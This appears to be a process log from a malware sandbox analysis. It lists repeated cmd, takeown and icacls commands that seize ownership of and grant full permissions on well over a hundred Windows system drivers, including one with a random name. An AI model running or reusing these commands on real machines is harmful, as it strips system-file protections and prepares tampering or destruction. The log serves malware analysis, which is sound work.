C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CompositeBus.sys && icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\CmBatt.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\cmdide.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\Classpnp.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\cng.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\CmBatt.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crcdisk.sys && icacls C:\Windows\System32\drivers\crcdisk.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\compbatt.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\cmdide.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\cng.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\compbatt.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\discache.sys && icacls C:\Windows\System32\drivers\discache.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\crashdmp.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\csc.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\crcdisk.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\CompositeBus.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\crcdisk.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\crashdmp.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\csc.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dfsc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\disk.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\Diskdump.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\discache.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dfsc.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dmvsc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\disk.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\Diskdump.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\drmk.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxapi.sys && icacls C:\Windows\System32\drivers\dxapi.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\discache.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-468445834-2128230535-764611997-4886643961977447839-439545291-574288105-609608957"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\drmkaud.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxg.sys && icacls C:\Windows\System32\drivers\dxg.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\drmk.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\drmkaud.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dumpfve.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dxg.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\Dumpata.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dxapi.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\elxstor.sys && icacls C:\Windows\System32\drivers\elxstor.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dxg.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dxgmms1.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dxapi.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1463292706144096278-370651642-2100047424-6415482721416079351070316455-383142363"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\dxgkrnl.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\errdev.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\elxstor.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\evbda.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\exfat.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\elxstor.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fastfat.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fastfat.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fdc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fj0msjdauhpv9q.sys && icacls C:\Windows\System32\drivers\fj0msjdauhpv9q.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\filetrace.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fileinfo.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\filetrace.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fileinfo.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fj0msjdauhpv9q.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fltMgr.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\flpydisk.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fsdepends.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "743240713-742270048551347731322819110-1644874240-922941343-11103210421032592711"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fj0msjdauhpv9q.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\flpydisk.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fltMgr.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fsdepends.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fs_rec.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS && icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\fvevol.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fs_rec.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1087591709-92056672-1253598651-1879131797-1335112715-14662424822112275550858281063"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\fvevol.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hcw85cir.sys && icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\gm.dls

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\gmreadme.txt

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hdaudbus.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\gm.dls /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\gmreadme.txt /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hcw85cir.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\HdAudio.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\HdAudio.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidbatt.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidbatt.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidbth.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iirsp.sys && icacls C:\Windows\System32\drivers\iirsp.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-418053795-1899157333950960065-7858902882962624187725797781121523780-1272631157"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidclass.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irda.sys && icacls C:\Windows\System32\drivers\irda.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\HpSAMD.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\http.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\intelide.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\intelppm.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1553693416-8570420411110430971202968208-17575597105854012291577416768-560925215"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ipfltdrv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\IPMIDrv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1565783127-403396006-422088805-1983253282-1987641688-44602381888583721455664808"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidclass.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\http.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ipnat.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\irenum.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hwpolicy.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidir.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidparse.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\irenum.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidir.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\iaStorV.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-16521866641313944452-1678148532-516451731-1791422047-4292602521585656347-436114749"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\irda.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidparse.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ks.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\isapnp.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ksecpkg.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\kbdhid.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\hidusb.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\i8042prt.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\kbdclass.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ksthunk.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\irda.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ksecdd.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\iirsp.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\lltdio.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\iirsp.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\lsi_fc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\hidusb.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\lsi_sas2.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\lsi_sas.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

